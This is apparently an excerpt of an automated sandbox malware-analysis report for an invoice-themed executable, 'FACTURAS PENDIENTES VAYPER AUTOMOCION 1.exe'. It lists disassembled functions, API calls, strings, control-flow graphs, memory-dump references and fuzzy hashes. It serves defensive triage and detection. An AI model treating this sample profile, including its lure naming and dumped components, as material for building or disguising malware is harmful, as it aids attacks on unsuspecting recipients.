                                  • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                  Function 004058AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 004058DF
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                    • Part of subcall function 004054C3: SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                  • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                  • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                  • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                  Function 004061EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DispatchMessageW.USER32(?), ref: 004061F6
                                  • PeekMessageW.USER32(?,00000000,?,T5@,?), ref: 0040620A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeek
                                  • String ID: T5@
                                  • API String ID: 1770753511-1075436632
                                  • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                  • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                  • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                  • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                  Function 00406CEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                  • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-1246513382
                                  • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                  • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                  • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                  • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                  Execution Graph

                                  Execution Coverage:0%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:100%
                                  Total number of Nodes:1
                                  Total number of Limit Nodes:0
                                  execution_graph 81953 32522b60 LdrInitializeThunk

                                  Executed Functions

                                  Function 325235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3 325235c0-325235cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                  • Instruction ID: 901f55cd631d95ff1acd2a401f06906f97f833eeec9581b60af63e1ade93d473
                                  • Opcode Fuzzy Hash: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                  • Instruction Fuzzy Hash: AF90023160650402D10571585618746115547D0211F69D412E1428528D87958B5575A2
                                  Function 32522B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 32522b60-32522b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                  • Instruction ID: d09a84b34bc0d4ec528d12ebb2a41203fd24f572147d881b0132a542c1bf15e1
                                  • Opcode Fuzzy Hash: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                  • Instruction Fuzzy Hash: 5890026120340003410A71585518756415A47E0211B59D022E2018550DC5258A957125
                                  Function 32522C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1 32522c70-32522c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                  • Instruction ID: 9098bf4c1091865611e31995e4432c0f01cdde84f4a81288ed4074767029000f
                                  • Opcode Fuzzy Hash: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                  • Instruction Fuzzy Hash: 4C90023120248802D1157158950878A015547D0311F5DD412E5428618D86958A957121
                                  Function 32522DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2 32522df0-32522dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                  • Instruction ID: 79b42483e59f6db2ebafd46d33cd99892196bd85a76985e76e78c621789691aa
                                  • Opcode Fuzzy Hash: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                  • Instruction Fuzzy Hash: DA90023120240413D11671585608747015947D0251F99D413E1428518D96568B56B121

                                  Non-executed Functions

                                  Function 325894E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 555 325894e0-32589529 556 32589578-32589587 555->556 557 3258952b-32589530 555->557 558 32589534-3258953a 556->558 559 32589589-3258958e 556->559 557->558 560 32589540-32589564 call 32529020 558->560 561 32589695-325896bd call 32529020 558->561 562 32589d13-32589d27 call 32524c30 559->562 569 32589593-32589634 GetPEB call 3258dc65 560->569 570 32589566-32589573 call 325a972b 560->570 571 325896dc-32589712 561->571 572 325896bf-325896da call 32589d2a 561->572 582 32589652-32589667 569->582 583 32589636-32589644 569->583 581 3258967d-32589690 RtlDebugPrintTimes 570->581 576 32589714-32589716 571->576 572->576 576->562 580 3258971c-32589731 RtlDebugPrintTimes 576->580 580->562 589 32589737-3258973e 580->589 581->562 582->581 585 32589669-3258966e 582->585 583->582 584 32589646-3258964b 583->584 584->582 587 32589670 585->587 588 32589673-32589676 585->588 587->588 588->581 589->562 591 32589744-3258975f 589->591 592 32589763-32589774 call 3258a808 591->592 595 3258977a-3258977c 592->595 596 32589d11 592->596 595->562 597 32589782-32589789 595->597 596->562 598 325898fc-32589902 597->598 599 3258978f-32589794 597->599 600 32589908-32589937 call 32529020 598->600 601 32589a9c-32589aa2 598->601 602 325897bc 599->602 603 32589796-3258979c 599->603 616 32589939-32589944 600->616 617 32589970-32589985 600->617 605 32589af4-32589af9 601->605 606 32589aa4-32589aad 601->606 608 325897c0-32589811 call 32529020 RtlDebugPrintTimes 602->608 603->602 607 3258979e-325897b2 603->607 611 32589ba8-32589bb1 605->611 612 32589aff-32589b07 605->612 606->592 610 32589ab3-32589aef call 32529020 606->610 613 325897b8-325897ba 607->613 614 325897b4-325897b6 607->614 608->562 641 32589817-3258981b 608->641 635 32589ce9 610->635 611->592 618 32589bb7-32589bba 611->618 620 32589b09-32589b0d 612->620 621 32589b13-32589b3d call 32588513 612->621 613->608 614->608 623 3258994f-3258996e 616->623 624 32589946-3258994d 616->624 628 32589991-32589998 617->628 629 32589987-32589989 617->629 625 32589c7d-32589cb4 call 32529020 618->625 626 32589bc0-32589c0a 618->626 620->611 620->621 647 32589d08-32589d0c 621->647 648 32589b43-32589b9e call 32529020 RtlDebugPrintTimes 621->648 634 325899d9-325899f6 RtlDebugPrintTimes 623->634 624->623 659 32589cbb-32589cc2 625->659 660 32589cb6 625->660 632 32589c0c 626->632 633 32589c11-32589c1e 626->633 638 325899bd-325899bf 628->638 636 3258998b-3258998d 629->636 637 3258998f 629->637 632->633 644 32589c2a-32589c2d 633->644 645 32589c20-32589c23 633->645 634->562 667 325899fc-32589a1f call 32529020 634->667 646 32589ced 635->646 636->628 637->628 642 3258999a-325899a4 638->642 643 325899c1-325899d7 638->643 650 3258986b-32589880 641->650 651 3258981d-32589825 641->651 656 325899ad 642->656 657 325899a6 642->657 643->634 654 32589c39-32589c7b 644->654 655 32589c2f-32589c32 644->655 645->644 653 32589cf1-32589d06 RtlDebugPrintTimes 646->653 647->592 648->562 684 32589ba4 648->684 666 32589886-32589894 650->666 664 32589852-32589869 651->664 665 32589827-32589850 call 32588513 651->665 653->562 653->647 654->653 655->654 661 325899af-325899b1 656->661 657->643 668 325899a8-325899ab 657->668 662 32589ccd 659->662 663 32589cc4-32589ccb 659->663 660->659 670 325899bb 661->670 671 325899b3-325899b5 661->671 672 32589cd1-32589cd7 662->672 663->672 664->666 674 32589898-325898ef call 32529020 RtlDebugPrintTimes 665->674 666->674 687 32589a3d-32589a58 667->687 688 32589a21-32589a3b 667->688 668->661 670->638 671->670 678 325899b7-325899b9 671->678 679 32589cd9-32589cdc 672->679 680 32589cde-32589ce4 672->680 674->562 692 325898f5-325898f7 674->692 678->638 679->635 680->646 685 32589ce6 680->685 684->611 685->635 689 32589a5d-32589a8b RtlDebugPrintTimes 687->689 688->689 689->562 693 32589a91-32589a97 689->693 692->647 693->618
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $ $0
                                  • API String ID: 3446177414-3352262554
                                  • Opcode ID: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                  • Instruction ID: 16146015e5e0b045e5200cf4aeca2ddb21d78ea1d72a483d83ad3c7e619fd449
                                  • Opcode Fuzzy Hash: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                  • Instruction Fuzzy Hash: 9032F5B56083818FE310CF68C584B5BFBE5BB88348F50492DF59987350DBB5EA49CB52
                                  Function 32590274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1298 32590274-32590296 call 32537e54 1301 32590298-325902b0 RtlDebugPrintTimes 1298->1301 1302 325902b5-325902cd call 324d76b2 1298->1302 1306 32590751-32590760 1301->1306 1307 325902d3-325902e9 1302->1307 1308 325906f7 1302->1308 1309 325902eb-325902ee 1307->1309 1310 325902f0-325902f2 1307->1310 1311 325906fa-3259074e call 32590766 1308->1311 1312 325902f3-3259030a 1309->1312 1310->1312 1311->1306 1315 325906b1-325906ba GetPEB 1312->1315 1316 32590310-32590313 1312->1316 1318 325906d9-325906de call 324db970 1315->1318 1319 325906bc-325906d7 GetPEB call 324db970 1315->1319 1316->1315 1320 32590319-32590322 1316->1320 1327 325906e3-325906f4 call 324db970 1318->1327 1319->1327 1323 3259033e-32590351 call 32590cb5 1320->1323 1324 32590324-3259033b call 324effb0 1320->1324 1332 3259035c-32590370 call 324d758f 1323->1332 1333 32590353-3259035a 1323->1333 1324->1323 1327->1308 1337 325905a2-325905a7 1332->1337 1338 32590376-32590382 GetPEB 1332->1338 1333->1332 1337->1311 1341 325905ad-325905b9 GetPEB 1337->1341 1339 325903f0-325903fb 1338->1339 1340 32590384-32590387 1338->1340 1342 325904e8-325904fa call 324f27f0 1339->1342 1343 32590401-32590408 1339->1343 1344 32590389-325903a4 GetPEB call 324db970 1340->1344 1345 325903a6-325903ab call 324db970 1340->1345 1346 325905bb-325905be 1341->1346 1347 32590627-32590632 1341->1347 1364 32590590-3259059d call 325911a4 call 32590cb5 1342->1364 1365 32590500-32590507 1342->1365 1343->1342 1349 3259040e-32590417 1343->1349 1362 325903b0-325903d1 call 324db970 GetPEB 1344->1362 1345->1362 1352 325905dd-325905e2 call 324db970 1346->1352 1353 325905c0-325905db GetPEB call 324db970 1346->1353 1347->1311 1350 32590638-32590643 1347->1350 1357 32590419-32590429 1349->1357 1358 32590438-3259043c 1349->1358 1350->1311 1359 32590649-32590654 1350->1359 1363 325905e7-325905fb call 324db970 1352->1363 1353->1363 1357->1358 1366 3259042b-32590435 call 3259dac6 1357->1366 1368 3259044e-32590454 1358->1368 1369 3259043e-3259044c call 32513bc9 1358->1369 1359->1311 1367 3259065a-32590663 GetPEB 1359->1367 1362->1342 1382 325903d7-325903eb 1362->1382 1395 325905fe-32590608 GetPEB 1363->1395 1364->1337 1374 32590509-32590510 1365->1374 1375 32590512-3259051a 1365->1375 1366->1358 1378 32590682-32590687 call 324db970 1367->1378 1379 32590665-32590680 GetPEB call 324db970 1367->1379 1381 32590457-32590460 1368->1381 1369->1381 1374->1375 1384 32590538-3259053c 1375->1384 1385 3259051c-3259052c 1375->1385 1401 3259068c-325906ac call 325886ba call 324db970 1378->1401 1379->1401 1391 32590472-32590475 1381->1391 1392 32590462-32590470 1381->1392 1382->1342 1398 3259056c-32590572 1384->1398 1399 3259053e-32590551 call 32513bc9 1384->1399 1385->1384 1396 3259052e-32590533 call 3259dac6 1385->1396 1393 325904e5 1391->1393 1394 32590477-3259047e 1391->1394 1392->1391 1393->1342 1394->1393 1403 32590480-3259048b 1394->1403 1395->1311 1405 3259060e-32590622 1395->1405 1396->1384 1404 32590575-3259057c 1398->1404 1415 32590563 1399->1415 1416 32590553-32590561 call 3250fe99 1399->1416 1401->1395 1403->1393 1409 3259048d-32590496 GetPEB 1403->1409 1404->1364 1410 3259057e-3259058e 1404->1410 1405->1311 1413 32590498-325904b3 GetPEB call 324db970 1409->1413 1414 325904b5-325904ba call 324db970 1409->1414 1410->1364 1423 325904bf-325904dd call 325886ba call 324db970 1413->1423 1414->1423 1417 32590566-3259056a 1415->1417 1416->1417 1417->1404 1423->1393
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 3446177414-1700792311
                                  • Opcode ID: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                  • Instruction ID: a2a0b79f1320000134df6f934c82201d96c3ae20c9f2aa96ab5b5f8a4d92b171
                                  • Opcode Fuzzy Hash: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                  • Instruction Fuzzy Hash: 63D1AC36901685DFDB06CF68C450AEDFBF1EF4A314F448899E889EB252DB749A81CF10
                                  Function 324DD34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/P2$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                  • API String ID: 0-674978239
                                  • Opcode ID: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                  • Instruction ID: 0176c48ed6959e02b753351a9524f6dbef7188ffcfd57a7ba0f2c2d65773f2de
                                  • Opcode Fuzzy Hash: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                  • Instruction Fuzzy Hash: FEB1EEB6808351DFD715CF24C8A0B5BBBE8AF88754F41092EF988D7241DB70DA49CB92
                                  Function 3258F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 3446177414-1745908468
                                  • Opcode ID: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                  • Instruction ID: 5011db66180615c67879835883c0a26dc3e9a88173bdf25dc12e2bf533f09e98
                                  • Opcode Fuzzy Hash: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                  • Instruction Fuzzy Hash: FB91CC35A01685DFEB06CF68C450A9DBBF2FF49314F94845DE845EB262CBB59A81CF10
                                  Function 325912ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  • Opcode ID: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                  • Instruction ID: adca2647442f944874057eb9c009592627c5656055447102e503db4701e33c2e
                                  • Opcode Fuzzy Hash: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                  • Instruction Fuzzy Hash: 8B128D74600762DFEB158F24C450BBABBF5EF09B54F54C89DE8868B642DB34EA81CB50
                                  Function 324DD08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 324DD2AF
                                  • @, xrefs: 324DD0FD
                                  • H/P2, xrefs: 3253A843
                                  • @, xrefs: 324DD313
                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324DD146
                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324DD0CF
                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324DD262
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324DD2C3
                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 324DD196
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
